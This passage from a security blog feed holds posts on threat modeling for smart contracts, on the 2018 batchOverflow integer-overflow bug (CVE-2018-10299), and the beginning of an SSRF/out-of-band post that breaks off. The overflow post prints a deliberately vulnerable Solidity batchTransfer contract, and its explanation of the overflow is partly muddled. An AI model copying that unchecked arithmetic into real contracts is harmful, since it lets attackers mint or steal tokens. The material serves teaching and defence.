href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji_GSFVNnd6L3dDug0DJmfGyFqA74Z3GnRNNiAbAfsQO04Th9h2Dl5CLEsd61HgjkbwuJZlGGxtSnpRIT_rchmULxC08Q8fHGW-3zTNb9PbfP2nydP6rFsdBVGDH2upIo53MmLVNJ4T1c/s702/NFT_Art.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="702" data-original-width="499" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji_GSFVNnd6L3dDug0DJmfGyFqA74Z3GnRNNiAbAfsQO04Th9h2Dl5CLEsd61HgjkbwuJZlGGxtSnpRIT_rchmULxC08Q8fHGW-3zTNb9PbfP2nydP6rFsdBVGDH2upIo53MmLVNJ4T1c/w454-h640/NFT_Art.png" width="454" /></a></div><br /><span style="text-align: justify;">There is a hidden secret in my NFT, please find it.</span><p></p><p><span style="text-align: justify;"><br /></span></p><p><span style="color: red;"><span style="text-align: justify;">Buy my NFT at </span><a href="https://rarible.com/token/0xd07dc4262bcdbf85190c01c996b4c06a461d2430:306353:0xadf2e43fdb4f39321da579978fa5f6fb2c06479d" target="_blank">rarible.com</a></span></p><p></p><div class="separator" style="clear: both; text-align: center;"> </div><div><br /></div><div class="blogger-post-footer">Penetest Horror Blog</div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-7947080244954191821.post-84283098439574874242021-02-14T12:48:00.001-08:002021-02-15T06:23:34.522-08:00Threat Modeling Smart Contract Applications<h2 style="text-align: justify;">INTRODUCTION </h2><div><div style="text-align: justify;">Ethereum Smart Contracts and other complex blockchain programs are new, promising and highly experimental. Therefore, we should expect constant changes in the security landscape, as new bugs and security risks are discovered, and new best practices are developed [1]. </div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">This article is going to focus on threat modeling of smart contract applications. Threat modelling is a process by which threats, such as absence of appropriate safeguards, can be identified, enumerated, and mitigation can be prioritized accordingly. The purpose of threat model is to provide contract applications defenders with a systematic analysis of what controls or defenses need to be included, given the nature of the system, the probable attacker's profile, the most likely attack vectors, and the assets most desired by an attacker. </div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Smart contract programming requires a different engineering mindset than we may be used to. The cost of failure can be high, and change can be difficult, making it in some ways more similar to hardware programming or financial services programming than web or mobile development. </div></div><h2 style="text-align: justify;">FORMAL VERIFICATION AND SMART CONTRACTS</h2><div style="text-align: justify;">At this point we should make clear that besides threat modeling, or as part of the threat modeling process, formal verification should also be mandatory. Formal verification is the act of proving or disproving the correctness of intended algorithms underlying a system with respect to a certain formal specification or property, using formal methods of mathematics. In a few words is crucial for the code to do what is supposed to do [2].</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">A very good project example, as far as formal verification is concerned is the Cardano cryptocurrency technology. Cardano is developing a technology using a provably correct security model that it provides a guaranteed limit of adversarial power [3]. Also Cardano is using Haskell as a programming language, which is a language that facilitates formal verification.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><h2>SMART CONTRACT ASSETS</h2><div>In order to continue analyzing the information from the Smart Contract ecosystem will define what are assets in the context of this Smart Contract Applications. </div><div><br /></div><div>Assets are:</div><div><ul><li>The Smart Contract function we require to protect. </li><li>The Smart Contract data we require to protect.</li></ul></div></div><h2 style="text-align: justify;">THREAT ACTORS</h2><div><span style="text-align: justify;">This section is going to focus on the threat actors of the smart contract applications. A threat actor or malicious actor is a person or entity responsible for an event or incident that impacts, the safety or security of smart contract applications. In the context if this article, the term is used to describe individuals and groups that perform malicious acts. </span></div><div><span style="text-align: justify;"><br /></span></div><div><span style="text-align: justify;">More specifically we are going to reference the following actors:</span></div><div><ul style="text-align: left;"><li><span style="text-align: justify;">Nation State Actor with unlimited resources </span></li><li><span style="text-align: justify;">Organized Crime</span> Actor with significant resources<span style="text-align: justify;"> </span></li><li><span style="text-align: justify;">Insiders Actor with extensive knowledge of the system </span></li><li><span style="text-align: justify;">Hacktivists Actor with ideology as a motive and limited resources</span></li><li><span style="text-align: justify;">Script Kiddies with limited knowledge of the technology and very few resources</span></li><li><span style="text-align: justify;">Others Actors, such as accidental attacks</span></li></ul></div><b>Note: </b>From a threat intelligence perspective, threat actors are often categorized as either unintentional or intentional and either external or internal. Also threat agents should be primarily based on access e.g. external or internal actors etc. The likelihood of the threat is closely related to the attacker motive e.g. Nation state attacker has high level of motivation and Script <span style="text-align: justify;">Kiddies</span> low level of motivation and therefor low likelihood. <h2 style="text-align: justify;">SMART CONTRACT THREAT ACTORS</h2><div style="text-align: justify;">In this section we are going to discuss the threat actors that are related only to Smart Contract Applications. Each technology has its own peculiarities, and blockhain technologies have their own. </div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">The actors that are related to Smart Contracts are two types:</div><div style="text-align: justify;"><ul><li>Malicious Smart Contracts </li><li>Humans interacting with Smart Contracts through DApps or directly.</li></ul><div>Smart contracts can call functions of other contracts and are even able create and deploy other contracts (e.g. issuing coins). There are several use-cases for this behavior. </div><div><br /></div><div>A few use cases of interacting with other contracts are described below:</div><div><ul><li>Use contracts as data stores</li><li>Use other contracts as libraries</li></ul><div><div>In the context of this article an Actor interacting with a Smart Contract outside the blockchain is en external Actor and an Actor interacting with a smart contract inside the blockchain is an internal Actor. </div></div></div></div><h2 style="text-align: justify;">COMMON SMART CONTRACT ATTACKS</h2>The following is a list of known attacks which we should be aware of, and defend against when writing smart contracts [4]. <div><ul style="text-align: left;"><li>Reentrancy</li><ul><li>Reentrancy on a Single Function</li><li>Cross-function Reentrancy</li></ul><li>Timestamp Dependence</li><li>Integer Overflow and Underflow</li><li>DoS with (Unexpected) revert</li><li>DoS with Block Gas Limit</li><li>Gas Limit DoS on the Network via Block Stuffing</li><li>Insufficient gas griefing</li><li>Forcibly Sending Ether to a Contract</li></ul>We are not going to explain each attack here. For more information please see the link [4].<h2 style="text-align: justify;">ATTACK TREES</h2><div><div style="text-align: justify;">This section is going to focus the attack trees of the contract applications. Attack Trees provide a formal, methodical way of describing the security of systems, based on varying attacks. A tree structure is used represent attacks against a system, with the goal as the root node and different ways of achieving that goal as leaf nodes. </div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">The attack attributes assist in associating risk with an attack. An Attack Tree can include special knowledge or equipment that is needed, the time required to complete a step, and the physical and legal risks assumed by the attacker. The values in the Attack Tree could also be operational or development expenses. An Attack Tree supports design and requirement decisions. If an attack costs the perpetrator more than the benefit, that attack will most likely not occur. However, if there are easy attacks that may result in benefit, then those need a defense.</div></div><div><span style="text-align: justify;"><br /></span></div><div><span style="text-align: justify;">Below we can see a typical client browser attack tree:</span></div><div><span style="text-align: justify;"><br /></span></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgO_-tE6uCtJLwjbmhNji5hAwsQNbc1_gls3SPSrOSDjMmV03dMZOlCUIDrnAqxbZCXwHU_TJqViYkUfs6eZ8U2c4xczEhJWzeRg47VWqCixZcsFa_MkPicaYQXTJ94rWqSADdhAwQpxAY/s581/Untitled+Diagram+%25283%2529.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="581" data-original-width="441" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgO_-tE6uCtJLwjbmhNji5hAwsQNbc1_gls3SPSrOSDjMmV03dMZOlCUIDrnAqxbZCXwHU_TJqViYkUfs6eZ8U2c4xczEhJWzeRg47VWqCixZcsFa_MkPicaYQXTJ94rWqSADdhAwQpxAY/w486-h640/Untitled+Diagram+%25283%2529.jpg" width="486" /></a></div><br /><span style="text-align: justify;"><br /></span></div><h2 style="text-align: justify;">ABUSE CASE DIAGRAMS</h2><div><div style="text-align: justify;">The relationships between the work products of a security engineering process can be hard to understand, even for persons with a strong technical background but little knowledge of security engineering. Market forces are driving software practitioners who are not security specialists to develop software that requires security features. When these practitioners develop software solutions without appropriate security-specific processes and models, they sometimes fail to produce effective solutions. Same thing happens with Smart Contract development, that is why abuse case diagrams should be used to model the security requirements of Smart Contract applications.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">We will define an abuse case as a specification of a type of complete interaction between a system and one or more actors, where the results of the interaction are harmful to the system, one of the actors, or one of the stakeholders in the system.</div></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Below we can see a simple use case diagram:</div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhStdgcVsgf3J0px8cCloCpQre26ZPB7K4dxrxunlCWIMJUePEkmNpUrGQ6EP3JMWG58ZTFDZdXtp-N9HhvsqBX8Eh5gzGAEW_N5EkyyiRx6Lqd2p45U_G0kFDKB2_AHu-1hqyzIiWiD38/s808/SmartContracts1.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="509" data-original-width="808" height="403" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhStdgcVsgf3J0px8cCloCpQre26ZPB7K4dxrxunlCWIMJUePEkmNpUrGQ6EP3JMWG58ZTFDZdXtp-N9HhvsqBX8Eh5gzGAEW_N5EkyyiRx6Lqd2p45U_G0kFDKB2_AHu-1hqyzIiWiD38/w640-h403/SmartContracts1.jpg" width="640" /></a></div><br /><div style="text-align: justify;">Below we can see a simple abuse case diagram with an external actor:</div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBcPou9zoBHvwfCCukb00Bg554tih0B9KYHAX2tddDCS5Daz8MEtgD6AyqCLlPhlr5FADuDMTvEhQZUNGrXw2N4RGw-YWtq20aKsYLDx0rckcKrT6aP4WA4Tv6VXNPNEKt_qrCgsjmW0Q/s835/Untitled+Diagram.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="669" data-original-width="835" height="512" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBcPou9zoBHvwfCCukb00Bg554tih0B9KYHAX2tddDCS5Daz8MEtgD6AyqCLlPhlr5FADuDMTvEhQZUNGrXw2N4RGw-YWtq20aKsYLDx0rckcKrT6aP4WA4Tv6VXNPNEKt_qrCgsjmW0Q/w640-h512/Untitled+Diagram.jpg" width="640" /></a></div><br /><div style="text-align: justify;"><br /></div><div style="text-align: justify;">In the diagram above an external bad actor is manipulating the login function externally. This is a typical client browser attack e.g. the DApp application has an stored XSS and the attacker install a fake login page or the DApp does not handle correctly users private key etc. </div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Below we can see another simple abuse case diagram with an external actor:</div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVShMYRBGC47zc_Zq_Vug3uE1XiLPeqFpDUTtdHBq01XHZ-Qdpae-Esd-Tn3IYuymbjp-hHSRyzbWuHkb4k8mCrHM5G_yYKDkbiTdQvAexAWlL4X6Yks3tBleukHPS7e_0GdPIjUz2JqE/s935/Untitled+Diagram+%25281%2529.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="509" data-original-width="935" height="348" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVShMYRBGC47zc_Zq_Vug3uE1XiLPeqFpDUTtdHBq01XHZ-Qdpae-Esd-Tn3IYuymbjp-hHSRyzbWuHkb4k8mCrHM5G_yYKDkbiTdQvAexAWlL4X6Yks3tBleukHPS7e_0GdPIjUz2JqE/w640-h348/Untitled+Diagram+%25281%2529.jpg" width="640" /></a></div><br /><div style="text-align: justify;">Again in the diagram above an external bad actor is manipulating the the approve function externally. This is a typical client browser attack e.g. the DApp application has CSRF and the attacker exploits the vulnerability through a phishing attack etc. </div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Below we can see a simple abuse case diagram with an internal actor:</div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiCpbAQQSAdSls5XyGIubdOlmLgXAA6ntI_X5br5BbEU7dJjGf1SIpQZ8QZAnMJjV9hhhIq52w3I9F9mXacw_Lmjl7gZEt69CqI3adXXr791mWB9XPNufpdP46cgplyLJMWVgq6uS-Gts/s958/Untitled+Diagram+%25282%2529.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="509" data-original-width="958" height="340" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiCpbAQQSAdSls5XyGIubdOlmLgXAA6ntI_X5br5BbEU7dJjGf1SIpQZ8QZAnMJjV9hhhIq52w3I9F9mXacw_Lmjl7gZEt69CqI3adXXr791mWB9XPNufpdP46cgplyLJMWVgq6uS-Gts/w640-h340/Untitled+Diagram+%25282%2529.jpg" width="640" /></a></div><br /><div style="text-align: justify;">Again in the diagram above an internal bad actor, this time, is manipulating the the approve function internally. This is an attack conducted internally from a malicious contract e.g. running a Reentrancy attack using the callback function e.t.c.</div><div style="text-align: justify;"><h2>LAST WORDS</h2><div>Before releasing any Smart Contract system make sure the system is pen-tested and the code is reviewed and there is in place a formal verification of the contract.</div><div><br /></div><div>For code reviews make sure to:</div><div><ul><li>Use a consistent code style</li><li>Avoid leaving commented code</li><li>Avoid unused code and unnecessary inheritance </li><li>Use a fixed version of the Solidity compiler </li><li>Analysis of GAS usage </li></ul></div><div>For pen-test make sure to:</div><div><ul><li>Run a normal Web App pen-test for the web component of the DApp</li><li>Check how the DApp is interacting with the Smart Contract</li></ul><div>Logical flow to follow would be:</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRcYt4F3nGT1fVfdD68r-TD0atP8fxSqYJSlEhBU2ZvqaAsuLwMtx5xz7cSVZlDM4NsQSKH9ROcMVggjLRAixCy8tRs8KnEnT8wdfIDKZn2xZ1533nny8ST-z8nnkaOyFOwNc9dq6HRxM/s601/Untitled+Diagram+%25284%2529.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="241" data-original-width="601" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRcYt4F3nGT1fVfdD68r-TD0atP8fxSqYJSlEhBU2ZvqaAsuLwMtx5xz7cSVZlDM4NsQSKH9ROcMVggjLRAixCy8tRs8KnEnT8wdfIDKZn2xZ1533nny8ST-z8nnkaOyFOwNc9dq6HRxM/w400-h160/Untitled+Diagram+%25284%2529.jpg" width="400" /></a></div><br /><div><br /></div><div><h2>TOOLS TO USE</h2></div><div>Below there is a list of tools we can utilize to test our Smart Contract system:</div><div><ul><li>Mythril :- Mythril is a security analysis tool for EVM bytecode. It detects security vulnerabilities in smart contracts built for Ethereum, Hedera, Quorum, Vechain, Roostock, Tron and other EVM-compatible blockchains.</li><li>Solhint :- Solhint is an open source project for linting Solidity code. This project provides both Security and Style Guide validations.</li></ul></div></div><div><b>References:</b> </div></div><div style="text-align: justify;"><ul><li><a href="https://consensys.github.io/smart-contract-best-practices/general_philosophy/" target="_blank">consensys.github.io</a> [1]</li><li><a href="https://en.wikipedia.org/wiki/Formal_verification">en.wikipedia.org</a> [2]</li><li><a href="https://why.cardano.org/en/science-and-engineering/formal-specification-and-verification/" target="_blank">why.cardano.org</a> [3]</li><li><a href="https://consensys.github.io/smart-contract-best-practices/known_attacks/" target="_blank">consensys.github.io</a> [4]</li><li><a href="https://medium.com/@MyPaoG/explaining-the-dao-exploit-for-beginners-in-solidity-80ee84f0d470" target="_blank">medium.com</a> [5]</li><li><a href="https://www.zupzup.org/smart-contract-interaction/" target="_blank">www.zupzup.org</a> [6]</li><li><a href="https://docs.soliditylang.org/en/latest/contracts.html?highlight=fallback#fallback-function" target="_blank">docs.soliditylang.org</a> [7]</li><li><a href="https://www.andrew.cmu.edu/course/95-750/docs/CaseModels.pdf" target="_blank">www.andrew.cmu.edu</a> [8]</li><li><a href="https://arvanaghi.com/blog/pentesting-ethereum-dapps/" target="_blank">arvanaghi.com</a> [9]</li></ul><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div></div><p style="text-align: justify;"><br /></p></div><div class="blogger-post-footer">Penetest Horror Blog</div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-7947080244954191821.post-87457409136516667372021-02-06T13:46:00.004-08:002021-02-07T08:31:15.062-08:00Get Rich Or Die Trying<h2 style="text-align: left;">Introduction</h2><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcv-i3wwfeVK97y2AjsVv5EHGh44dqsFrDEWfUEGGKLomk7ZkCKKxgK_xBbs3DfqhumzKa0vrFR8J7h_jwBGgMCCreWK7NNoWKHIA_X_XlZTwDoGEQy7O0fUF0gbycT6Zwvqx_HMtrgRY/s225/download.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="225" data-original-width="225" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcv-i3wwfeVK97y2AjsVv5EHGh44dqsFrDEWfUEGGKLomk7ZkCKKxgK_xBbs3DfqhumzKa0vrFR8J7h_jwBGgMCCreWK7NNoWKHIA_X_XlZTwDoGEQy7O0fUF0gbycT6Zwvqx_HMtrgRY/w200-h200/download.png" width="200" /></a></div><br /><div style="text-align: justify;"><br /></div><div style="text-align: justify;">This article is going to focus on <i>"Programmable Money Overflow Attacks"</i> on Ethereum and this is the way hackers can become rich and famous. More specifically we are going to discuss the batchOverflow attack. The batchOverflow Bug was identified in multiple ERC20 Smart Contracts [3] (CVE-2018–10299), back in 2018, when Ethereum was relatively new. [1] </div><div style="text-align: justify;"><i><br /></i></div><div style="text-align: justify;">The batchOverflow attack is a typical integer overflow attack in the batchTransfer function of a smart contract implementation for the Beauty Ecosystem Coin (BEC). The BEC was an Ethereum ERC20 compliant token that allowed attackers to accomplish an unauthorized increase of digital assets by providing two _receivers arguments in conjunction with a large _value argument, as exploited in the wild in April 2018 [2]. But before we move into replicating the attack, it is better if we explain a few Blockchain properties.</div><div style="text-align: justify;"><br /></div><h2 style="text-align: justify;">The Code Is Law Principle </h2><div style="text-align: justify;">The <i>"code is law principle"</i> is the principle that no one has the right to censor the execution of code on the ETH blockchain. In layman's terms this means that as soon as a smart contract is deployed on the ETH blockchain, then the code cannot change. One of the main defining properties of Ethereum Smart Contracts is that their code is immutable. Blockchain immutability means that all the engaging parties agree to the terms or “code” of the Smart Contract, that code can’t be changed by any party unilaterally [4]. And this is the main reason a Smart Contract gets trustworthy.</div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTgyj_B0QDr7dPCmWBaIlx9UWyAltPUvKYCtIIiBYudJth-Ny78mkDIlMso2LReBx615J26uQBlqD0dDDdpzfhYov9itAJSADF45481jJ3DpGG7biO-bMDs2sDAt5kYyg_d8rGDEt2PaQ/s225/download.jpeg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="225" data-original-width="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTgyj_B0QDr7dPCmWBaIlx9UWyAltPUvKYCtIIiBYudJth-Ny78mkDIlMso2LReBx615J26uQBlqD0dDDdpzfhYov9itAJSADF45481jJ3DpGG7biO-bMDs2sDAt5kYyg_d8rGDEt2PaQ/s0/download.jpeg" /></a></div><br /><div>Well that is not exactly true, a contract, can be a) destroyed or get b) upgraded. Which essentially means that the code:</div><div><ul style="text-align: left;"><li>In the first scenario will stop functioning, but wont get deleted (because a blockchain is immutable)</li><li>In the second scenario the smart contract will get:</li><ul><li>Upgraded and modify their code, while not preserving their address, state, and balance.</li><li>Upgraded and modify their code, while preserving their address, state, and balance, by using special tools (e.g. by using tools such as OpenZeppelin Upgrades Plugins, or proxy smart contracts) [7].</li></ul></ul></div><div>Below we can see an Ethereum blockchain [6]:</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLFl9f3m_vSTzrY3UFS6arMAO6xBvT3TN5MY54zOO9Bqq8pzmv9XX3oq7q90CW_R6HiXwdEC6I66i_sLR5bk4lIYhm7IGYRBbuB0OakfqUQxXfqB756Np2xuecw57-ulHqQi6JzJsCSfU/s1048/eOwjD.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="728" data-original-width="1048" height="444" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLFl9f3m_vSTzrY3UFS6arMAO6xBvT3TN5MY54zOO9Bqq8pzmv9XX3oq7q90CW_R6HiXwdEC6I66i_sLR5bk4lIYhm7IGYRBbuB0OakfqUQxXfqB756Np2xuecw57-ulHqQi6JzJsCSfU/w640-h444/eOwjD.png" width="640" /></a></div><br /><div><span style="text-align: justify;">When the contract is destroyed the state root of the block account is zeroed. Each block has a <i>"state root"</i> which contains accounts. With a Self-destruct function the opcode triggered is used to zero out the block account of the smart contract. </span><span style="text-align: justify;">The Bitcoin ledger is based on recording transactions and the Ethereum blockchain is based on managing account balances. Why am I giving you all this information? Well, to put it simple, to explain that deleting or upgrading a Smart Contract is not an easy job. And guess what, in order to install a security patch to a smart contract we need either to destroy the old smart contract and create a new one or upgrade the current smart contract. This essentially means that <b>Smart Contract governance is important</b>. In the early stages of the cryptocurrency space, such governance was not something that was carefully designed.</span></div><div><br /></div><div style="text-align: justify;"><h2>The Money Overflow</h2></div><div style="text-align: justify;"><div>Below we can see some vulnerable code for explaining the actual vulnerability. In the following code we are replicating the behavior and the insufficient user input validation code. </div><div><br /></div><div><span style="color: red;">pragma solidity ^0.4.10;</span></div><div><br /></div><div>contract TheOverflow {</div><div> </div><div><span> </span>mapping (address => uint) contractBalances;</div><div> </div><div><span> </span>function contribute() payable { </div><div><span> </span><span> </span>contractBalances[msg.sender] = msg.value;</div><div><span> </span>}</div><div> </div><div><span> </span>function getBalance() constant returns (uint) {</div><div> <span> </span>return contractBalances[msg.sender]; </div><div> }</div><div> </div><div><span> </span><span style="color: red;">function batchTransfer(address[] _receivers, uint _value) { </span></div><div><span> </span>// This is the infamous batchTransfer vulnerable function</div><div> // Overflow line, that caused the hack</div><div> <span> </span><span style="color: red;">uint totalReceivers = _receivers.length * _value;</span></div><div> </div><div> require(contractBalances[msg.sender] >= totalReceivers); // Here is the user input validation</div><div> contractBalances[msg.sender] = contractBalances[msg.sender] -totalReceivers;</div><div> </div><div> for(uint counter=0; counter< _receivers.length; counter++) { // Here is the function loop</div><div> contractBalances[_receivers[counter]] = contractBalances[_receivers[counter]] + _value;</div><div> } </div><div> }</div><div>}</div><div><br /></div><div>The ways the batchTransfer function works is that it accepts as input the receivers addresses and the value to transfer e.g., it will get as an input a list with three or more addresses, along with the value of the ETH to transfer. Then it will get the number of the receivers and check against each receiver the balance e.g. see if the address that withdraws ETH has enough.</div><div><br /></div><div><div>The vulnerable function batchTransfer shown in the code above: </div><div><ol><li>The variable _value accepts the amount to be transferred as a user input (declared as 256 bits integer).</li><li>The variable _value was overflowed with zeros and got zeroed out.</li><li>When the variable _value is zeroed out the require checks got bypassed.</li><li>The require check then became - 0>=0, which is a true condition.</li></ol></div></div><div><h2>What Is An ERC20 Token And Why Is Relevant</h2><div>ERC-20 has emerged as a Smart Contract <i>de-facto</i> technical standard; it is used for all Smart Contracts on the Ethereum blockchain for token implementation and provides a list of rules that all Ethereum-based tokens must follow [9]. This means that in order for a token to run on the Ethereum, it has to implement certain functionality, or more specifically an interface. </div><div><br /></div><div>As of<u> October 2019, more than 200,000 ERC-20-compatible tokens exist on Ethereum's main network.</u> The ERC-20 defines a common list of rules that all Ethereum tokens must adhere to. Some of these rules include how the tokens can be transferred, how transactions are approved, how users can access data about a token, and the total supply of tokens [9]. Consequently, this particular token empowers developers of all types to accurately predict how new tokens will function within the larger Ethereum system. The same applies also for attackers, a hacker understands that all ERC20 tokens, must implement certain functionality, in order to interface with the Ethereum blockchain. But the implementation details of these functions is going to be handled by the developer, not the standard. </div><div><br /></div><h2> How Did exchanges React To The Hack?</h2><div>Due to lack of coordination between Centralized Exchanges (CEX) and Decentralized Exchanges (DEX) no immediate response took place. This resulted into hacking attacks taking place for a long period of time, even when the hack does not go unnoticed. An extra layer of security must be added that monitors the Smart Contract behavior and takes action accordingly. For example in our attack scenario the suspicious transaction should have been blocked due to excessive withdraw of funds. </div><h2>The Impact</h2>The bug was discovered 04/22/2018. The weakness was released 04/23/2018 (Website). The advisory is shared at dasp.co. This vulnerability is uniquely identified as CVE-2018-10299 since 04/22/2018. It is possible to initiate the attack remotely. No form of authentication is needed for exploitation. It demands that the victim is doing some kind of user interaction. Technical details are known, but no exploit is available. The price for an exploit might be around USD $5k-$25k at the moment (estimation calculated on 01/30/2020) [8]. </div></div><div><i><br /></i></div><div><b>References:</b></div><div><ul style="text-align: left;"><li><a href="https://consensys.github.io/smart-contract-best-practices/known_attacks/" target="_blank">consensys.github.io</a> [1]</li><li><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10299" target="_blank">cve.mitre.org</a> [2]</li><li><a href="https://www.investopedia.com/news/what-erc20-and-what-does-it-mean-ethereum/">investopedia</a> [3]</li><li><a href="https://espeoblockchain.com/blog/ethereum-smart-contract">espeoblockchain</a> [4]</li><li><a href="https://ethereum-classic-guide.readthedocs.io/en/latest/docs/appendices/code_is_law_principle.html">ethereum-classic-guide.readthedocs.io</a> [5]</li><li><a href="https://ethereum.stackexchange.com/questions/1294/what-is-actually-removed-during-a-contract-suicide-and-why-doesnt-this-cause-t?rq=1">ethereum.stackexchange.com</a> [6]</li><li><a href="https://docs.openzeppelin.com/learn/upgrading-smart-contracts">openzeppelin.com</a> [7]</li><li><a href="https://vuldb.com/?id.116961" target="_blank">vuldb.com</a> [8]</li><li><a href="https://www.investopedia.com/news/what-erc20-and-what-does-it-mean-ethereum/" target="_blank">investopedia.com</a> [9]</li></ul><div><br /></div></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div class="blogger-post-footer">Penetest Horror Blog</div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-7947080244954191821.post-3427414405397177412020-02-22T09:05:00.003-08:002020-02-29T11:41:17.969-08:00SSRFing External Service Interaction and Out of Band Resource Load (Hacker's Edition)<h2 style="text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7F4K0eVOTka-oGekk23-G_e7VuO2Tyx-OJeWSNYojFzgJ4YUGq4C05mcVYPcCYlWJ3B9I9Wp15HCsv7HwmZaPafYq1CgKp25rlBVYoF0JbHEPTlaLavAYpr8vCl2DTn49jvcDDakunw0/s1600/linux_cloud_native_environment_1.jpg"><img border="0" height="427" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7F4K0eVOTka-oGekk23-G_e7VuO2Tyx-OJeWSNYojFzgJ4YUGq4C05mcVYPcCYlWJ3B9I9Wp15HCsv7HwmZaPafYq1CgKp25rlBVYoF0JbHEPTlaLavAYpr8vCl2DTn49jvcDDakunw0/s640/linux_cloud_native_environment_1.jpg" width="640" /></a></h2>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In the recent past we encountered two relativly new type of Attacks. External Service Interaction (ESI) and Out-of-band resource loads (OfBRL).</div>
<div style="text-align: justify;">
<ol>
<li>An ESI [1] occurs only when a Web Application allow interaction with an arbitrary external service. </li>
<li>OfBRL [6] arises when it is possible to induce an application to fetch content from an arbitrary external location, and incorporate that content into the application's own response(s). </li>
</ol>
</div>
<h3 style="text-align: justify;">
</h3>
<h3 style="text-align: justify;">
The Problem with OfBRL</h3>
<div style="text-align: justify;">
The ability to request and retrieve web content from other systems can allow the application server to be used as a two-way attack proxy (when OfBRL is applicable) or a one way proxy (when ESI is applicable). By submitting suitable payloads, an attacker can cause the application server to attack, or retrieve content from, other systems that it can interact with. This may include public third-party systems, internal systems within the same organization, or services available on the local loopback adapter of the application server itself. Depending on the network architecture, this may expose highly vulnerable internal services that are not otherwise accessible to external attackers.</div>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
The Problem with ESI</h3>
<div style="text-align: justify;">
External service interaction arises when it is possible to induce an application to interact with an arbitrary external service, such as a web or mail server. The ability to trigger arbitrary external service interactions does not constitute a vulnerability in its own right, and in some cases might even be the intended behavior of the application. However, in many cases, it can indicate a vulnerability with serious consequences.</div>
<div style="text-align: justify;">
<br />
<h3>
The Verification</h3>
<div>
We do not have ESI or OfBRL when:</div>
<div>
<ol>
<li>In colaborator the source IP is our browser IP </li>
<li>There is a 302 redirect from our hosts to the collaborator (aka. our source IP appears in the collaborator)</li>
</ol>
</div>
</div>
<div style="text-align: justify;">
Below we can see the original configuration in the repeater:</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
